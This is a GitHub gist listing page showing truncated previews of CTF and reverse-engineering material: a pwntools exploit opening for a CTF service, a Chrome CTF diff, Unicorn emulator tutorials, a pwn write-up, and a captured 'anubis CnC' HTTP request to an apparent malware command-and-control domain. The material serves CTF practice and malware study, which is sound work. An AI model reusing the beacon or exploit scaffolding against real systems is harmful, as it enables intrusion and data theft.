Skip to content

Instantly share code, notes, and snippets.

@Eterna1
Eterna1 / sos.ml
Created April 28, 2021 12:23
sos.ml
View sos.ml
open struct
let blocked = `Blocked
module Blocked = struct
let blocked = blocked
end
end
module Fixed_stdlib = struct
let open_in = blocked
@Eterna1
Eterna1 / service.py
Created August 8, 2019 06:49
service.py
View service.py
#! /usr/bin/python
import subprocess
import sys
import time
from threading import Timer
def kill(proc):
proc.kill()
def main():
@Eterna1
Eterna1 / chrome_diff.diff
Created August 8, 2019 06:47
chrome_diff.diff
View chrome_diff.diff
diff --git a/content/browser/BUILD.gn b/content/browser/BUILD.gn
index 7a1d4333934a..3218fb403839 100644
--- a/content/browser/BUILD.gn
+++ b/content/browser/BUILD.gn
@@ -236,6 +236,14 @@ jumbo_source_set("browser") {
]
sources = [
+ "CTF/person_interface_impl.cc",
+ "CTF/person_interface_impl.h",
@Eterna1
Eterna1 / exploit.py
Created June 4, 2019 13:43
malwaredb2 epxloit
View exploit.py
from pwn import *
#r = remote("localhost", 1337)
r = remote("malwaredb2.zajebistyc.tf", 30103)
print r.recvuntil("5. Exit\n\n---------------------------------------")
def new(name, description="", sha="", ransom=""):
r.send("1\n")
View anubis CnC
POST /private/tuk_tuk.php HTTP/1.1
Content-Length: 104
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: aktivierung-342675-deustchland-services.ru
Connection: close
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
p=NjBkMDgxOTg5ODYyMmUxOThjY2Y2ZTI3OGYyNDZjMDE1OTJhOWE3M2ZiZjZlODVkMGE5NWMyNDVm
ZjY3NTQ5ZTc3YWNhOGQxOGM=
@Eterna1
Eterna1 / zadanie3.py
Created November 24, 2017 14:03
zadanie3.py
View zadanie3.py
from unicorn import *
from unicorn.x86_const import *
import struct
def read(name):
with open(name) as f:
return f.read()
def u32(data): #zamien ciag 4 bajtow na liczbe w formacie little-endian
View gist:ed950307a676a2f2c1f2c860d2296fec
from unicorn import *
from unicorn.x86_const import *
import struct
def read(name):
with open(name) as f:
return f.read()
def u32(data): #zamien ciag 4 bajtow na liczbe w formacie little-endian
View moj_piekny_kodzik.py
from unicorn import *
from unicorn.x86_const import *
import struct
def read(name):
with open(name) as f:
return f.read()
def u32(data): #zamien ciag 4 bajtow na liczbe w formacie little-endian
@Eterna1
Eterna1 / UE.md
Last active July 18, 2018 23:21
UE tutorial
View UE.md

Cheatsheet

from unicorn import * - ładujemy bibliotekę unicorna i stałe
from unicorn.x86_const import * - ładujemy stałe dotyczące architektur x86 i x86_64

stałe występujące w module unicorn:

UC_API_MAJOR        UC_ERR_VERSION       UC_MEM_READ         UC_PROT_ALL
UC_API_MINOR        UC_ERR_WRITE_PROT      UC_MEM_READ_AFTER      UC_PROT_EXEC
@Eterna1
Eterna1 / Mikhail.md
Last active March 24, 2018 22:37
Mikhail writeup - pwn200
View Mikhail.md

W tym zadaniu dostajemy binarkę która działa po stronie serwera i źródło w C++.

programem checksec który instaluje się razem z pwndbg można sprawdzić z jakimi zabezpieczeniami program został skompilowany.

b@x:~/Desktop/mikhail > checksec story
[*] '/home/b/Desktop/mikhail/story'
  Arch:   amd64-64-little
  RELRO:  Partial RELRO
 Stack: No canary found